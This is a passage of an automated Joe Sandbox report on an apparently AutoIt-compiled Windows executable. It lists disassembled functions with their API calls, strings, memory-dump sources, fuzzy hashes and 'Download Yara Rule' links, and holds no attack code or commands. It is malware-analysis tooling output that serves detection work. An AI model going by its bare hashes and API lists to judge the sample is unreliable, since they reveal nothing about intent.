              • API ID: LengthMessageSendTextWindow
              • String ID: edit
              • API String ID: 2978978980-2167791130
              • Opcode ID: 68575ed1e67d8cea431b479bc2e4a0da1562d3a80c8980fc0d576b683648f9d4
              • Instruction ID: b098eab3779f02b048996a7163aca903a24eb58c0fc33a73f1a6c2826e67099b
              • Opcode Fuzzy Hash: 68575ed1e67d8cea431b479bc2e4a0da1562d3a80c8980fc0d576b683648f9d4
              • Instruction Fuzzy Hash: 4D119DB1120309ABEB204E649C49AAA3769EB15378F504724F961E71E1C775DCB19B60
              Function 001E2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 001E2F11
              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001E2F30
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: InfoItemMenu_memset
              • String ID: 0
              • API String ID: 2223754486-4108050209
              • Opcode ID: 8501b580b14e6bea700dde73fb968c96e35a3d1ad0f95a812b16401326b188ea
              • Instruction ID: f68577a653582346aae1c7789721ec5a4cbd14d6c63508fa6cd0751f29350590
              • Opcode Fuzzy Hash: 8501b580b14e6bea700dde73fb968c96e35a3d1ad0f95a812b16401326b188ea
              • Instruction Fuzzy Hash: 971104319016A4ABDB24DB59DC18B9D77BDEB02310F0900B1FC54A72A0D7B0ED04C791
              Function 001F24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
              Download Yara Rule
              APIs
              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001F2520
              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001F2549
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Internet$OpenOption
              • String ID: <local>
              • API String ID: 942729171-4266983199
              • Opcode ID: 2c58ff02943ee9faae4c66fccdd27665070c76a8e0ba57f2ecade1af1a214304
              • Instruction ID: 42be0acdf798cb0dadb0fcd507932105b4420cdff7e6b4ba77f7f9e52aac744a
              • Opcode Fuzzy Hash: 2c58ff02943ee9faae4c66fccdd27665070c76a8e0ba57f2ecade1af1a214304
              • Instruction Fuzzy Hash: E411C2B0541229BADB288F518C99EFBFF68FF06751F10812AFA0586450D3B0A951DAF1
              Function 001F80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001F830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,001F80C8,?,00000000,?,?), ref: 001F8322
              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001F80CB
              • htons.WSOCK32(00000000,?,00000000), ref: 001F8108
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ByteCharMultiWidehtonsinet_addr
              • String ID: 255.255.255.255
              • API String ID: 2496851823-2422070025
              • Opcode ID: ecfaf58e286f5ae226728fc6da7f8ed6543e12c17b1da1a774b186cebb494bac
              • Instruction ID: e20eb8181c44ecdad57d160660d2305d2def3fdfbd351f6cc5a3c98cde5d5c97
              • Opcode Fuzzy Hash: ecfaf58e286f5ae226728fc6da7f8ed6543e12c17b1da1a774b186cebb494bac
              • Instruction Fuzzy Hash: 1A11E574204309ABCB20AF64CC46FBDB364FF14310F108627FA1197291DB71A811C751
              Function 00190A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
              Download Yara Rule
              APIs
              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00183C26,002462F8,?,?,?), ref: 00190ACE
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              • _wcscat.LIBCMT ref: 001C50E1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FullNamePath_memmove_wcscat
              • String ID: c$
              • API String ID: 257928180-2531412009
              • Opcode ID: a3fe7258114566040df37a1b5caa52eb596d02a9936a2cea546c9c53ab88b669
              • Instruction ID: 5e7806454f0eec6b4d4d9b7e54aa8b6bc50d9e16770fc68f191e69f8deb3853e
              • Opcode Fuzzy Hash: a3fe7258114566040df37a1b5caa52eb596d02a9936a2cea546c9c53ab88b669
              • Instruction Fuzzy Hash: 6411CE39A14208AACF05FBA4CD05ED977F9EF2C350B1000A5B949D7281EB30EB848B11
              Function 001D92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001D9355
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassMessageNameSend_memmove
              • String ID: ComboBox$ListBox
              • API String ID: 372448540-1403004172
              • Opcode ID: ae85f4859378e3789a4d676a349759baeb10a629c70eed8c5417694c7ca72402
              • Instruction ID: 88d4f0152203e94e8a0c4d261b994dd4bcd434e5f8df3094df411c2d30a1b154
              • Opcode Fuzzy Hash: ae85f4859378e3789a4d676a349759baeb10a629c70eed8c5417694c7ca72402
              • Instruction Fuzzy Hash: 34019E75A45214ABCB08FBA4CC918FE77A9FF56720B54061AB932573D2DB3199088B60
              Function 001D91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,00000180,00000000,?), ref: 001D924D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassMessageNameSend_memmove
              • String ID: ComboBox$ListBox
              • API String ID: 372448540-1403004172
              • Opcode ID: 844d780182238a0870da0b887695b9795ea7c9c0d598dbf0d3057f4c7a8d40ef
              • Instruction ID: ede222b06e08fff6e176a3519ec384f0d16ec9467bdc981b20fcd30a891265b1
              • Opcode Fuzzy Hash: 844d780182238a0870da0b887695b9795ea7c9c0d598dbf0d3057f4c7a8d40ef
              • Instruction Fuzzy Hash: 8E018875A4520477CB18FBA0C9D2DFF73ACDF55700F1501167512672C1DB11AF189671
              Function 001D9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,00000182,?,00000000), ref: 001D92D0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassMessageNameSend_memmove
              • String ID: ComboBox$ListBox
              • API String ID: 372448540-1403004172
              • Opcode ID: 8e198880c204e262879facb58846ac4a48923d30827b79d2eb86d4d3cd424605
              • Instruction ID: 61268284bba1a549791e746c2bfffde8db857db4e069d5d18bff57ad6c791963
              • Opcode Fuzzy Hash: 8e198880c204e262879facb58846ac4a48923d30827b79d2eb86d4d3cd424605
              • Instruction Fuzzy Hash: 7501A2B1A85208B7CB14FAA4C9C2EFF77AC9F21700F650116B912636C2DB219F0896B1
              Function 001A6DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __calloc_crt
              • String ID: @R$
              • API String ID: 3494438863-995463125
              • Opcode ID: 011e8463a16827c9ba156b3b7a209952a703403d718cb62ba10ea02fca8c927c
              • Instruction ID: 05187fa2eb613cc9f0e32838380f99f1d7340feda6bc35aa8bcb8509331c849c
              • Opcode Fuzzy Hash: 011e8463a16827c9ba156b3b7a209952a703403d718cb62ba10ea02fca8c927c
              • Instruction Fuzzy Hash: 8AF0967D718B16BBF728CF68FD097A12795E713764F190427E600DB595EBB088818681
              Function 001E51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassName_wcscmp
              • String ID: #32770
              • API String ID: 2292705959-463685578
              • Opcode ID: 6fd92f2df662c0b9078dd49e97403609572ae704ce753805f8705a10865cb42a
              • Instruction ID: 1572c38db34817e7f0366be30e4e32993550e576166f64aed510da5e3e635cdc
              • Opcode Fuzzy Hash: 6fd92f2df662c0b9078dd49e97403609572ae704ce753805f8705a10865cb42a
              • Instruction Fuzzy Hash: C0E0617390032D17D3209B95AC09F97F7ACEB51731F000067FD10D3050D760994487D1
              Function 001D81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
              Download Yara Rule
              APIs
              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001D81CA
                • Part of subcall function 001A3598: _doexit.LIBCMT ref: 001A35A2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Message_doexit
              • String ID: AutoIt$Error allocating memory.
              • API String ID: 1993061046-4017498283
              • Opcode ID: 740164e35fa5a28b0690af001530ad492a0c22a77fdad2651c8888bac1a796a0
              • Instruction ID: 6f11057b072fbd71987adb9f8209cdbf95eb2282d88ccc424dafe21758c8137c
              • Opcode Fuzzy Hash: 740164e35fa5a28b0690af001530ad492a0c22a77fdad2651c8888bac1a796a0
              • Instruction Fuzzy Hash: FAD05B373C531936D21532A87D0BFC6768C4B27B51F104416BB18955D38FD295E142D9
              Function 001BB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001BB564: _memset.LIBCMT ref: 001BB571
                • Part of subcall function 001A0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001BB540,?,?,?,0018100A), ref: 001A0B89
              • IsDebuggerPresent.KERNEL32(?,?,?,0018100A), ref: 001BB544
              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0018100A), ref: 001BB553
              Strings
              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001BB54E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
              • API String ID: 3158253471-631824599
              • Opcode ID: 0c31c372081aab4797a600ed082197860bbbc9b3cae06b8797389d83e1fb0d5c
              • Instruction ID: c640acb9f354692e785f7d44b18c107142c5cfa6af19ea0c4aa5d949bea2883f
              • Opcode Fuzzy Hash: 0c31c372081aab4797a600ed082197860bbbc9b3cae06b8797389d83e1fb0d5c
              • Instruction Fuzzy Hash: 1FE06D742043209FD371DF68F6483827BE0AF05754F00892CF846C2A61D7F5E908CB62